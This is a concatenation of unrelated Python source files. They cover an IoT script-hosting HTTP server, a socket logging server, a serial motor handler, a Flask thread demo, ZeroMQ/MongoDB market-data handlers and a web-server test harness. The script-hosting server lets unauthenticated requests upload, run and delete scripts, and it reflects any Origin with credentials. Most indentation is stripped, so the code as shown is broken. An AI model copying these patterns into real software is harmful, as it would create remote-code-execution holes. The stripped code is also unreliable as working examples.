# self.editArea.insert(tk.INSERT, "\n>" +
# str(self.logInput.get()) + "\n")
self.logInput.delete(0, 'end')
"""
class Process:
runningProcesses = []
def restartProcess(self, process):
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
for i, items in enumerate(self.runningProcesses):
if(items['name'] == process):
print('>Killing Process: ' + str(items['processID']))
try:
os.kill(items['processID'], signal.SIGBREAK)
pass
except Exception:
pass
filePortSet = open(
savesAsJson['cloudscripts'][i]['info']['filename'], "r")
scriptPatched = filePortSet.read().replace(
"DEF_PORT", str(items['port']))
filePortSet.close()
fileSet = codecs.open(
savesAsJson['cloudscripts'][i]['info']['filename'], "w", "utf-8")
fileSet.write(scriptPatched)
fileSet.close()
processCMD = ""
if (savesAsJson['cloudscripts'][i]['info']['language'] == 'javascript'):
processCMD = 'node '
elif (savesAsJson['cloudscripts'][i]['info']['language'] == 'python'):
processCMD = 'python '
process1 = subprocess.Popen([processCMD, savesAsJson['cloudscripts'][i]['info']['filename']],
stdout=subprocess.PIPE,
stderr=None,
universal_newlines=True)
self.runningProcesses[i]["processID"] = process1.pid
print("Running subprocesses: " + str(self.runningProcesses))
    def startAllProcesses(self):
        global process_running  # module-level flag checked by the main loop at the bottom of this file
        jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
for i, itemThings in enumerate(savesAsJson["cloudscripts"]):
# print(itemThings['info']['filename'])
filePortSet = open(itemThings['info']['filename'], "r")
scriptPatched = filePortSet.read().replace("DEF_PORT", str(8001+i))
filePortSet.close()
fileSet = codecs.open(itemThings['info']['filename'], "w", "utf-8")
fileSet.write(scriptPatched)
fileSet.close()
if(itemThings['info']['language'] == 'javascript'):
process1 = subprocess.Popen(['node', itemThings['info']['filename']],
stdout=None,
stderr=None,
universal_newlines=False)
elif (itemThings['info']['language'] == 'python'):
process1 = subprocess.Popen(['python', itemThings['info']['filename']],
stdout=None,
stderr=None,
universal_newlines=False)
self.runningProcesses.append(
{'ID': i, 'processID': process1.pid, 'name': itemThings['info']['name'], 'port': 8001+i})
process_running = True
print("Running subprocesses: " + str(self.runningProcesses))
def startProcess(self, process):
print("Starting new Process!")
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
for i, items in enumerate(savesAsJson["cloudscripts"]):
if(items['info']['name'] == process):
filePortSet = open(
savesAsJson['cloudscripts'][i]['info']['filename'], "r")
scriptPatched = filePortSet.read().replace(
"DEF_PORT", str(8001+i))
filePortSet.close()
fileSet = codecs.open(
savesAsJson['cloudscripts'][i]['info']['filename'], "w", "utf-8")
fileSet.write(scriptPatched)
fileSet.close()
processCMD = ""
if (savesAsJson['cloudscripts'][i]['info']['language'] == 'javascript'):
processCMD = 'node '
elif (savesAsJson['cloudscripts'][i]['info']['language'] == 'python'):
processCMD = 'python '
process1 = subprocess.Popen([processCMD, savesAsJson['cloudscripts'][i]['info']['filename']],
stdout=subprocess.PIPE,
stderr=None,
universal_newlines=True)
self.runningProcesses.append(
{'ID': i, 'processID': process1.pid, 'name': items['info']['name'], 'port': 8001+i})
print("Running subprocesses: " + str(self.runningProcesses))
class StorageHandler():
savesAsJson = None
def __init__(self):
super().__init__()
jsonFile = open("thingsaves.json", "r")
self.savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
def getFilenameByName(self, name):
for i, itemThings in enumerate(self.savesAsJson["cloudscripts"]):
# print(itemThings)
if (itemThings['info']['name'] == name):
return itemThings['info']['filename']
def getLanguageByName(self, name):
for i, itemThings in enumerate(self.savesAsJson["cloudscripts"]):
# print(itemThings)
if (itemThings['info']['name'] == name):
return itemThings['info']['language']
def getCloudscriptByName(self, name):
for i, itemThings in enumerate(self.savesAsJson["cloudscripts"]):
# print(itemThings)
if (itemThings['info']['name'] == name):
return itemThings
def getIndexByName(self, name):
for i, itemThings in enumerate(self.savesAsJson["cloudscripts"]):
# print(itemThings)
if (itemThings['info']['name'] == name):
return i
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
pr = Process()
fs = StorageHandler()
def do_GET(self):
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
print("Request from \"" +
str(self.headers["Referer"]) + "\" with path " + str(self.path))
path1 = str(self.path)
print(str(self.path))
if (path1.startswith("/create")):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# http://192.168.0.159:8000/create?name="thing1"&lang="javascript"
query = parse_qs(path1[8:])
name = str(query['name']).replace("['\"", "").replace("\"']", "")
title = str(query['title']).replace("['\"", "").replace("\"']", "")
lang = str(query['lang']).replace("['\"", "").replace("\"']", "")
desc = str(query['desc']).replace("['\"", "").replace("\"']", "")
user = str(query['user']).replace("['\"", "").replace("\"']", "")
response = BytesIO()
response.write(b"creating new thing ")
self.wfile.write(response.getvalue())
thingSaves = codecs.open("thingsaves.json", "r", "utf-8")
jsonThingSaves = thingSaves.read()
thingSaves.close()
arraySize = 1
try:
arraySize = len(json.loads(jsonThingSaves)["cloudscripts"]) + 1
except Exception:
pass
newThingJson = {
"thingID": arraySize,
"info": {
"title": title,
"name": name,
"description": desc,
"language": lang,
"user": user,
"filename": name + (".js" if lang == "javascript" else ".py")
}
}
if (len(jsonThingSaves) > 0):
jsonParsed = json.dumps(newThingJson)
print("JSON parsed: ", jsonParsed)
data = json.loads(jsonThingSaves)["cloudscripts"]
data1 = ""
if (len(data) == 1):
data1 = json.loads(json.dumps(str(data[:len(data)]).replace(
"[", "").replace("]", ""))) + ","
else:
data1 = ""
jsonSaves = "{\"cloudscripts\":[" + \
data1 + json.dumps(newThingJson) + "]}"
codecs.open("thingsaves.json", "w").close()
f = codecs.open("thingsaves.json", "w")
f.write(jsonSaves.replace("\'", "\""))
f.close()
else:
open("thingsaves.json", "w").close()
jsonSave = {"cloudscripts": [newThingJson]}
f = open("thingsaves.json", "w",)
f.write(json.dumps(jsonSave))
f.close()
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
if (lang == "javascript"):
newThing = open(name + ".js", "w")
newThing.write(
"var express=require(\'express\')\nvar app=express()\n\napp.get(\'/" + name + "\', (req, res)=> {\n res.send(\'Hello World!\')\n console.log(\"Hello\")\n})\n\n//leave this untouched! \napp.listen(DEF_PORT)")
newThing.close()
self.pr.startProcess(name)
elif (lang == "python"):
newThing = open(name + ".py", "w")
newThing.write("from http.server import BaseHTTPRequestHandler, HTTPServer\n"
"from io import BytesIO\n\n"
"PORT = DEF_PORT\n\n"
"class ServerHandler(BaseHTTPRequestHandler):\n"
" def do_GET(self):\n"
" self.send_response(200)\n"
" # Headers for security measures\n"
" self.send_header(\"Content-type\", \"text/plain\")\n"
" self.send_header('Access-Control-Allow-Credentials', 'true')\n"
" self.send_header('Access-Control-Allow-Origin',str(self.headers[\"Origin\"]))\n"
" self.end_headers()\n"
" path = str(self.path)\n"
" if(path.startswith(\"/" +
name + "\")):\n"
" res = BytesIO()\n"
" res.write(b'Hello world from Thing 1!')\n"
" self.wfile.write(res.getvalue())\n\n"
"#DON'T TOUCH THIS PART\n"
"server = HTTPServer(('localhost', PORT), ServerHandler)\n"
"server.serve_forever()\n")
newThing.close()
elif (path1.startswith("/delete")):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
response = BytesIO()
response.write(b"Deleting specified thing.")
self.wfile.write(response.getvalue())
query = parse_qs(path1[8:])
name = str(query['name']).replace("['\"", "").replace("\"']", "")
os.remove(self.fs.getFilenameByName(name))
del (savesAsJson['cloudscripts'][self.fs.getIndexByName(name)])
print("Reprinting again: ")
for i, itemThings in enumerate(savesAsJson["cloudscripts"]):
itemThings["thingID"] -= 1 if itemThings["thingID"] != 0 else 0
print(itemThings)
open("thingsaves.json", "w").close()
writeFile = open("thingsaves.json", "w")
writeFile.write(json.dumps(savesAsJson))
writeFile.close()
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
elif (path1.startswith("/get")):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header('Access-Control-Allow-Credentials', 'true')
self.send_header('Access-Control-Allow-Origin',
str(self.headers["Origin"]))
self.end_headers()
query = parse_qs(path1[5:])
name = str(query['name']).replace("['\"", "").replace("\"']", "")
response = ""
for i, itemThings in enumerate(savesAsJson["cloudscripts"]):
if (itemThings["info"]["name"] == name):
scriptFile = open(itemThings["info"]["filename"], "r")
response = scriptFile.read()
if (itemThings["info"]["language"] == "javascript"):
response = response[0: (response.index(
'listen(')+7)] + "DEF_PORT);"
scriptFile.close()
elif(itemThings["info"]["language"] == "python"):
response = response[0: (
response.index('PORT =')+6)] + " DEF_PORT \n\n" + response[response.index('PORT =')+13:]
scriptFile.close()
res = BytesIO()
res.write(str.encode(response))
self.wfile.write(res.getvalue())
else:
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
for i, item in enumerate(savesAsJson['cloudscripts']):
if (self.path[1:].startswith(item['info']['name'])):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
restOfQuery = self.path[len(item['info']['name'])+1:]
#print("Rest of query: " + restOfQuery)
res = BytesIO()
req = requests.get(
"http://localhost:" + str(self.pr.runningProcesses[i]['port']) + restOfQuery)
res.write(str.encode(req.text))
self.wfile.write(res.getvalue())
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
print(str(self.path))
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header('Access-Control-Allow-Credentials', 'true')
self.send_header('Access-Control-Allow-Origin',
str(self.headers["Origin"]))
self.end_headers()
path1 = str(self.path)
if (path1.startswith("/upload")):
print("Uploading new file!")
query = parse_qs(path1[8:])
name = str(query['name']).replace("['\"", "").replace("\"']", "")
try:
open(self.fs.getFilenameByName(name), "w").close()
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
scriptFile = codecs.open(
self.fs.getFilenameByName(name), "w", "utf-8")
scriptFile.write(body.decode())
scriptFile.close()
self.pr.restartProcess(name)
response = BytesIO()
response.write(b'New Script Succesfully Uploaded')
response.write(b'Received: ')
response.write(body)
self.wfile.write(response.getvalue())
pass
            except Exception as e:
                print("Error: " + str(e))
response = BytesIO()
response.write(b'Specified Script file does not exist.')
self.wfile.write(response.getvalue())
pass
process1 = None
process_running = False
def serveInThread():
while True:
httpd.handle_request()
if __name__ == '__main__':
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
# Getting ip address
hostname = socket.gethostname()
local_ip = socket.gethostbyname(hostname)
print("Starting server. " + local_ip + ":8000")
httpd = socketserver.TCPServer(
(local_ip, 8000), SimpleHTTPRequestHandler)
serverThread = threading.Thread(target=serveInThread)
serverThread.daemon = True
serverThread.start()
pr = Process()
pr.startAllProcesses()
while True:
        if process_running:
            timeNow = datetime.now().strftime("%H:%M")
            if (str(timeNow) == "01:00"):
                jsonFile = open("thingsaves.json", "r")
                req = requests.post(
                    "http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
        time.sleep(30)  # avoid a busy loop; re-check the clock every 30 seconds
|
multiprocess_logging.py
|
import socket
import threading
import multiprocessing as mp
import multiprocessing.connection as mpc
import logging
import sys
import signal
import time
import os
from pipeline_cluster import util
def _handle_connection(conn, caddr):
while True:
try:
msg = conn.recv()
logging.debug("[" + time.strftime("%d %m %Y %H:%M:%S") + " - " + caddr[0] + " - " + str(msg["pid"]) + "] " + msg["message"])
except EOFError as e: # maybe this should catch all exceptions in case the client disconnects while sending
break
except ConnectionResetError as e:
break
conn.close()
def _serve(addr, conn_buffer_size, filename):
signal.signal(signal.SIGINT, lambda signum, frame: exit(0))
signal.signal(signal.SIGTERM, lambda signum, frame: exit(0))
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
file_logger = logging.FileHandler(filename, "a", "utf-8")
root_logger.addHandler(file_logger)
log_handler = logging.StreamHandler(sys.stdout)
root_logger.addHandler(log_handler)
with mpc.Listener(addr, "AF_INET", conn_buffer_size, None) as lst:
while True:
conn = lst.accept()
caddr = lst.last_accepted
threading.Thread(target=_handle_connection, args=(conn, caddr)).start()
def serve(addr, filename, conn_buffer_size=2, detach=False):
if detach:
        proc = mp.Process(target=_serve, args=(addr, conn_buffer_size, filename), daemon=True)
        proc.start()
        return proc
else:
_serve(addr, conn_buffer_size, filename)
server_address = ("", 5555)
def set_default_address(log_addr):
global server_address
server_address = log_addr
def log(msg, addr=None, timeout=5, retry_sleep=1):
print(msg)
addr = addr if addr is not None else server_address
conn = util.connect_timeout(addr, retry=True, retry_timeout=timeout, retry_sleep=retry_sleep)
conn.send({
"pid": os.getpid(),
"message": msg
})
conn.close()
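# Illustrative usage sketch (hypothetical entry point, not part of the original
# module): start a detached log server and send one message to it from this process.
if __name__ == "__main__":
    addr = ("127.0.0.1", 5555)
    serve(addr, "pipeline_cluster.log", detach=True)
    set_default_address(addr)
    time.sleep(0.5)  # give the listener a moment to bind before connecting
    log("logging server is up")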
|
SerialHandler.py
|
from PyQt5.Qt import *
import threading
import serial
import time
from collections import namedtuple
from MotorCommand import MotorCommand
from array import array
from io import BytesIO
from struct import *
"""
Class Serial handler
This class opens a serial device with the defined port and baudrate
and keeps emitting messages using PyQt signals
"""
class SerialHandler(QObject):
bufferUpdated = pyqtSignal(tuple)
startThread = pyqtSignal()
stopThread = pyqtSignal()
pauseThread = pyqtSignal()
resumeThread = pyqtSignal()
flushSerial = pyqtSignal()
def __init__(self, parent):
super(SerialHandler, self).__init__()
self.running = False
self.pause = False
self.thread = threading.Thread(target=self.serialHandlerThread)
self.device = 'COM4'
self.baudrate = 115200
self.rate = 1000000
# prepare connections with parent window
self.startThread.connect(self.startProcess)
self.stopThread.connect(self.stopProcess)
self.pauseThread.connect(self.pauseProcess)
self.resumeThread.connect(self.resumeProcess)
self.flushSerial.connect(self.flush)
self.alone = None
self.compound = None
self.refMsg = None
self.cmd = MotorCommand()
self.serial_mutex = threading.Lock()
self.ser = serial.Serial()
# with serial.Serial(self.device, self.baudrate, timeout=0.1) as ser:
# self.ser = ser
        # message structure
self.struct_fmt = '<BBhhh'
self.struct_len = calcsize(self.struct_fmt)
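        # Layout of '<BBhhh' (little-endian): two unsigned bytes followed by three
        # signed 16-bit integers, 8 bytes in total, e.g.
        #   unpack('<BBhhh', b'\x01\x02\x10\x00\x20\x00\x30\x00') == (1, 2, 16, 32, 48)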
def set_COM_port_settings(self, com_port):
self.ser.port = self.device
self.ser.baudrate = self.baudrate
self.ser.bytesize = serial.EIGHTBITS #number of bits per bytes
self.ser.parity = serial.PARITY_NONE #set parity check: no parity
self.ser.stopbits = serial.STOPBITS_ONE #number of stop bits
self.ser.timeout = 3 #non-block read
self.ser.xonxoff = False #disable software flow control
self.ser.rtscts = False #disable hardware (RTS/CTS) flow control
self.ser.dsrdtr = False #disable hardware (DSR/DTR) flow control
self.ser.writeTimeout = 3 #timeout for write
def __exit__(self, exc_type, exc_value, traceback):
self.stopProcess()
def setInterface(self, device, baudrate):
self.ser.port = device
self.ser.baudrate = baudrate
self.device = device
self.baudrate = baudrate
def isRunning(self):
return (self.running or not self.pause)
def to_hex(self,data):
return ":".join("{:02x}".format(c) for c in data)
def send_command(self,command):
self.set_command(command)
buff = BytesIO()
self.cmd.serialize(buff)
#print(self.to_hex(buff.getvalue()))
#print(buff.getvalue())
base_cmd_int = bytearray(buff.getvalue())
#checksum = 255 - ( sum(base_cmd_int) % 256 )
# Packet: FF FF BASE_CMD CHECKSUM
#packet = bytearray([0xFF, 0xFF]) + base_cmd_int + bytearray([checksum]) + bytearray([0x0D])
packet = bytearray([0xFF,0xFF]) + base_cmd_int + bytearray([0x0D])
        packet_str = array('B', packet).tobytes()  # array.tostring() was removed in Python 3.9
with self.serial_mutex:
self.write_serial(packet_str)
def write_serial(self, data):
"""
Write in the serial port.
"""
#print(self.cmd)
#print("Hex: {}".format(to_hex(data)))
self.ser.flushInput()
self.ser.flushOutput()
self.ser.write(data)
def set_command(self,command):
self.cmd.id = command.id
self.cmd.cmd = command.cmd
self.cmd.pref = command.pref
self.cmd.P = command.P
self.cmd.I = command.I
self.cmd.D = command.D
# pyqt signals definition
@pyqtSlot()
def startProcess(self):
self.running = True
self.thread.start()
@pyqtSlot()
def stopProcess(self):
self.running = False
@pyqtSlot()
def pauseProcess(self):
self.pause = True
@pyqtSlot()
def resumeProcess(self):
self.pause = False
@pyqtSlot()
def flush(self):
#self.ser.reset_input_buffer()
print(self.ser.readline())
@pyqtSlot(int)
def setRate(self, rate):
self.rate = rate
# main thread
def serialHandlerThread(self):
while self.running is True:
# read messages
try:
if self.ser.inWaiting():
msg = self.ser.read(self.struct_len)
rxCom = unpack(self.struct_fmt, msg)
#print(type(rxCom))
self.bufferUpdated.emit(rxCom)
#print(msg)
except Exception as e:
print(e)
#else:
# pass
# handle sampling rate
#time.sleep(1/self.rate)
self.ser.write(bytes('q\n','UTF-8'))
self.ser.close()
return 0
|
server.py
|
from flask import Flask,jsonify
import flask
import threading
import time
app = Flask(__name__)
k=1
threads=[]
def thread_function(name):
    t = threading.current_thread()  # currentThread() is deprecated
while getattr(t, "do_run", True):
print("work ",name)
time.sleep(name)
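# The /stop route below relies on this cooperative flag: setting
# thread.do_run = False makes the worker's while-loop exit on its next check,
# since getattr(t, "do_run", True) then returns False.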
@app.route('/start')
def hello_world():
global k
global threads
threads.append(threading.Thread(target=thread_function, args=(k,)))
threads[k-1].start()
k=k+1
response = jsonify({'some': threading.active_count()})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/stop')
def stop():
global k
global threads
threads[k-2].do_run = False
threads.pop(k-2)
k=k-1
response = jsonify({'some': threading.active_count()})
response.headers.add('Access-Control-Allow-Origin', '*')
return response
app.run(debug=True)
|
handler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/5/25 0025 14:52
# @Author : Hadrianl
# @File : handler.py
# @Contact : 137150224@qq.com
import pymongo as pmo
from .utils import logger, handler_profiler, zmq_ctx
from threading import Thread, Timer
from abc import abstractmethod
import zmq
import pickle
from .extra.rpc import RPCServer
from collections import deque
from concurrent.futures import ThreadPoolExecutor
import time
class BaseHandler:
def __init__(self, name, topic: (str, list) = None, *args, **kwargs):
self.name = name
self.topic = set(topic if isinstance(topic, list) else
[topic]) if topic is not None else set()
self.ctx = zmq_ctx
self.sub_socket = self.ctx.socket(zmq.SUB)
self.sub_socket.setsockopt(zmq.RCVTIMEO, 3000)
self._thread_pool = ThreadPoolExecutor(max_workers=1)
self.inproc = set()
        if self.topic:  # if topic is None (the default), subscribe to every topic
for t in self.topic:
self.sub_socket.setsockopt(zmq.SUBSCRIBE, pickle.dumps(t))
else:
self.sub_socket.subscribe('')
        if kwargs.get('latest', False):  # pass latest=True to keep only the most recent message
self.data_queue = deque(maxlen=1)
self.latest = True
else:
self.data_queue = deque()
self.latest = False
self.__active = False
def run(self):
        self.task = self._thread_pool.submit(logger.info, f'Handler:{self.name} started')
while self.__active:
try:
topic_, msg_ = self.sub_socket.recv_multipart()
                if msg_ is None:  # a None message is the shutdown signal
break
topic = pickle.loads(topic_)
msg = pickle.loads(msg_)
self.data_queue.append([topic, msg])
if len(self.data_queue) >= 1000:
                    logger.warning(f'Handler:{self.name} has more than 1000 unhandled messages!')
if self.task.done():
self.task = self._thread_pool.submit(self.handle, *self.data_queue.popleft())
except zmq.error.Again:
...
except Exception as e:
logger.exception(f'<Handler>-{self.name} exception:{e}')
self._thread_pool.shutdown()
        logger.info(f'Handler:{self.name} stopped')
def add_topic(self, new_topic):
self.sub_socket.setsockopt(zmq.SUBSCRIBE, pickle.dumps(new_topic))
self.topic.add(new_topic)
def remove_topic(self, topic):
self.sub_socket.setsockopt(zmq.UNSUBSCRIBE, pickle.dumps(topic))
self.topic.remove(topic)
def stop(self, wsname):
try:
self.inproc.remove(wsname)
self.sub_socket.disconnect(f'inproc://{wsname}')
finally:
if not self.inproc:
self.__active = False
self.thread.join()
def start(self, wsname):
self.sub_socket.connect(f'inproc://{wsname}')
self.inproc.add(wsname)
if not self.__active:
self.__active = True
self.thread = Thread(target=self.run, name=self.name)
            self.thread.daemon = True  # Thread.setDaemon() is deprecated
self.thread.start()
@abstractmethod
    def handle(self, topic, msg):  # every handler must override this method
...
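# Minimal illustrative subclass (not part of the original module): a handler
# that simply logs every (topic, msg) pair it receives. Real handlers override
# handle() the same way, as DBHandler and RPCServerHandler do below.
class _EchoHandler(BaseHandler):
    def handle(self, topic, msg):
        logger.info(f'{self.name} received {topic}: {msg}')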
class TimeHandler:
def __init__(self, name, interval, get_msg=None):
self.name = name
self.interval = interval
self.get_msg = get_msg
self._active = False
def run(self, interval):
while self._active:
try:
msg = self.get_msg() if self.get_msg else None
self.handle(msg)
except Exception as e:
logger.exception(f'<TimeHandler>-{self.name} exception:{e}')
finally:
time.sleep(interval)
def stop(self):
self._active = False
def start(self):
self.timer = Thread(target=self.run, args=(self.interval, ))
        self.timer.name = self.name  # setName()/setDaemon() are deprecated
        self.timer.daemon = True
self.timer.start()
@abstractmethod
def handle(self, msg):
...
class DBHandler(BaseHandler, pmo.MongoClient):
def __init__(self, topic=None, host='localhost', port=27017, db='HuoBi'):
BaseHandler.__init__(self, 'DB', topic)
pmo.MongoClient.__init__(self, host, port)
self.db = self.get_database(db)
def into_db(self, data, topic: str):
collection = self.db.get_collection(topic)
try:
if 'kline' in topic:
if isinstance(data, dict):
collection.update({'id': data['id']}, data, upsert=True)
elif isinstance(data, list):
for d in data:
collection.update({'id': d['id']}, d, upsert=True)
elif 'trade.detail' in topic:
for d in data:
d['id'] = str(d['id'])
collection.update({'id': d['id']}, d, upsert=True)
elif 'depth' in topic:
collection.update({'version': data['version']}, data, upsert=True)
except Exception as e:
            logger.error(f'<data> database insert error - {e}')
def handle(self, topic, msg):
if 'ch' in msg or 'rep' in msg:
topic = msg.get('ch') or msg.get('rep')
data = msg.get('tick') or msg.get('data')
self.into_db(data, topic)
class RPCServerHandler(BaseHandler):
def __init__(self, reqPort=6868, pubPort=6869, topic=None):
BaseHandler.__init__(self, 'RPCServer', topic)
self.rpcServer = RPCServer(reqPort, pubPort)
self.rpcServer.startREP()
def handle(self, topic, msg):
self.rpcServer.publish(topic, msg)
def register_func(self, name, func):
self.rpcServer.register_rpcFunc(name, func)
def unregister_func(self, name):
self.rpcServer.unregister_rpcFunc(name)
|
unit.py
|
import os
import re
import ssl
import sys
import json
import time
import shutil
import socket
import select
import argparse
import platform
import tempfile
import unittest
import subprocess
from multiprocessing import Process
class TestUnit(unittest.TestCase):
pardir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
architecture = platform.architecture()[0]
maxDiff = None
detailed = False
save_log = False
def __init__(self, methodName='runTest'):
super().__init__(methodName)
if re.match(r'.*\/run\.py$', sys.argv[0]):
args, rest = TestUnit._parse_args()
TestUnit._set_args(args)
@classmethod
def main(cls):
args, rest = TestUnit._parse_args()
for i, arg in enumerate(rest):
if arg[:5] == 'test_':
rest[i] = cls.__name__ + '.' + arg
sys.argv = sys.argv[:1] + rest
TestUnit._set_args(args)
unittest.main()
def setUp(self):
self._run()
def tearDown(self):
self.stop()
# detect errors and failures for current test
def list2reason(exc_list):
if exc_list and exc_list[-1][0] is self:
return exc_list[-1][1]
if hasattr(self, '_outcome'):
result = self.defaultTestResult()
self._feedErrorsToResult(result, self._outcome.errors)
else:
result = getattr(self, '_outcomeForDoCleanups',
self._resultForDoCleanups)
success = not list2reason(result.errors) \
and not list2reason(result.failures)
# check unit.log for alerts
with open(self.testdir + '/unit.log', 'r', encoding='utf-8',
errors='ignore') as f:
self._check_alerts(f.read())
# remove unit.log
if not TestUnit.save_log and success:
shutil.rmtree(self.testdir)
else:
self._print_path_to_log()
def check_modules(self, *modules):
self._run()
for i in range(50):
with open(self.testdir + '/unit.log', 'r') as f:
log = f.read()
m = re.search('controller started', log)
if m is None:
time.sleep(0.1)
else:
break
if m is None:
self.stop()
exit("Unit is writing log too long")
current_dir = os.path.dirname(os.path.abspath(__file__))
missed_module = ''
for module in modules:
if module == 'go':
env = os.environ.copy()
env['GOPATH'] = self.pardir + '/go'
try:
process = subprocess.Popen(['go', 'build', '-o',
self.testdir + '/go/check_module',
current_dir + '/go/empty/app.go'], env=env)
process.communicate()
m = module if process.returncode == 0 else None
except:
m = None
elif module == 'node':
if os.path.isdir(self.pardir + '/node/node_modules'):
m = module
else:
m = None
elif module == 'openssl':
try:
subprocess.check_output(['which', 'openssl'])
output = subprocess.check_output([
self.pardir + '/build/unitd', '--version'],
stderr=subprocess.STDOUT)
m = re.search('--openssl', output.decode())
except:
m = None
else:
m = re.search('module: ' + module, log)
if m is None:
missed_module = module
break
self.stop()
self._check_alerts(log)
shutil.rmtree(self.testdir)
if missed_module:
raise unittest.SkipTest('Unit has no ' + missed_module + ' module')
def stop(self):
if self._started:
self._stop()
def _run(self):
self.testdir = tempfile.mkdtemp(prefix='unit-test-')
os.mkdir(self.testdir + '/state')
print()
def _run_unit():
subprocess.call([self.pardir + '/build/unitd',
'--no-daemon',
'--modules', self.pardir + '/build',
'--state', self.testdir + '/state',
'--pid', self.testdir + '/unit.pid',
'--log', self.testdir + '/unit.log',
'--control', 'unix:' + self.testdir + '/control.unit.sock'])
self._p = Process(target=_run_unit)
self._p.start()
if not self.waitforfiles(self.testdir + '/unit.pid',
self.testdir + '/unit.log', self.testdir + '/control.unit.sock'):
exit("Could not start unit")
self._started = True
self.skip_alerts = [r'read signalfd\(4\) failed']
self.skip_sanitizer = False
def _stop(self):
with open(self.testdir + '/unit.pid', 'r') as f:
pid = f.read().rstrip()
subprocess.call(['kill', '-s', 'QUIT', pid])
for i in range(50):
if not os.path.exists(self.testdir + '/unit.pid'):
break
time.sleep(0.1)
if os.path.exists(self.testdir + '/unit.pid'):
exit("Could not terminate unit")
self._started = False
self._p.join(timeout=1)
self._terminate_process(self._p)
def _terminate_process(self, process):
if process.is_alive():
process.terminate()
process.join(timeout=5)
if process.is_alive():
exit("Could not terminate process " + process.pid)
if process.exitcode:
exit("Child process terminated with code " + str(process.exitcode))
def _check_alerts(self, log):
found = False
alerts = re.findall('.+\[alert\].+', log)
if alerts:
print('All alerts/sanitizer errors found in log:')
[print(alert) for alert in alerts]
found = True
if self.skip_alerts:
for skip in self.skip_alerts:
alerts = [al for al in alerts if re.search(skip, al) is None]
if alerts:
self._print_path_to_log()
self.assertFalse(alerts, 'alert(s)')
if not self.skip_sanitizer:
sanitizer_errors = re.findall('.+Sanitizer.+', log)
if sanitizer_errors:
self._print_path_to_log()
                self.assertFalse(sanitizer_errors, 'sanitizer error(s)')
if found:
print('skipped.')
def waitforfiles(self, *files):
for i in range(50):
wait = False
ret = False
for f in files:
if not os.path.exists(f):
wait = True
break
if wait:
time.sleep(0.1)
else:
ret = True
break
return ret
@staticmethod
def _parse_args():
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-d', '--detailed', dest='detailed',
action='store_true', help='Detailed output for tests')
parser.add_argument('-l', '--log', dest='save_log',
action='store_true', help='Save unit.log after the test execution')
return parser.parse_known_args()
@staticmethod
def _set_args(args):
TestUnit.detailed = args.detailed
TestUnit.save_log = args.save_log
def _print_path_to_log(self):
print('Path to unit.log:\n' + self.testdir + '/unit.log')
class TestUnitHTTP(TestUnit):
def http(self, start_str, **kwargs):
sock_type = 'ipv4' if 'sock_type' not in kwargs else kwargs['sock_type']
port = 7080 if 'port' not in kwargs else kwargs['port']
url = '/' if 'url' not in kwargs else kwargs['url']
http = 'HTTP/1.0' if 'http_10' in kwargs else 'HTTP/1.1'
headers = ({
'Host': 'localhost',
'Connection': 'close'
} if 'headers' not in kwargs else kwargs['headers'])
body = b'' if 'body' not in kwargs else kwargs['body']
crlf = '\r\n'
if 'addr' not in kwargs:
addr = '::1' if sock_type == 'ipv6' else '127.0.0.1'
else:
addr = kwargs['addr']
sock_types = {
'ipv4': socket.AF_INET,
'ipv6': socket.AF_INET6,
'unix': socket.AF_UNIX
}
if 'sock' not in kwargs:
sock = socket.socket(sock_types[sock_type], socket.SOCK_STREAM)
if sock_type == sock_types['ipv4'] or sock_type == sock_types['ipv6']:
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if 'wrapper' in kwargs:
sock = kwargs['wrapper'](sock)
connect_args = addr if sock_type == 'unix' else (addr, port)
try:
sock.connect(connect_args)
except ConnectionRefusedError:
sock.close()
return None
else:
sock = kwargs['sock']
if 'raw' not in kwargs:
req = ' '.join([start_str, url, http]) + crlf
            if body != b'':
if isinstance(body, str):
body = body.encode()
if 'Content-Length' not in headers:
headers['Content-Length'] = len(body)
for header, value in headers.items():
req += header + ': ' + str(value) + crlf
req = (req + crlf).encode() + body
else:
req = start_str
sock.sendall(req)
if TestUnit.detailed:
print('>>>', req, sep='\n')
resp = ''
if 'no_recv' not in kwargs:
enc = 'utf-8' if 'encoding' not in kwargs else kwargs['encoding']
resp = self.recvall(sock).decode(enc)
if TestUnit.detailed:
print('<<<', resp.encode('utf-8'), sep='\n')
if 'raw_resp' not in kwargs:
resp = self._resp_to_dict(resp)
if 'start' not in kwargs:
sock.close()
return resp
return (resp, sock)
def delete(self, **kwargs):
return self.http('DELETE', **kwargs)
def get(self, **kwargs):
return self.http('GET', **kwargs)
def post(self, **kwargs):
return self.http('POST', **kwargs)
def put(self, **kwargs):
return self.http('PUT', **kwargs)
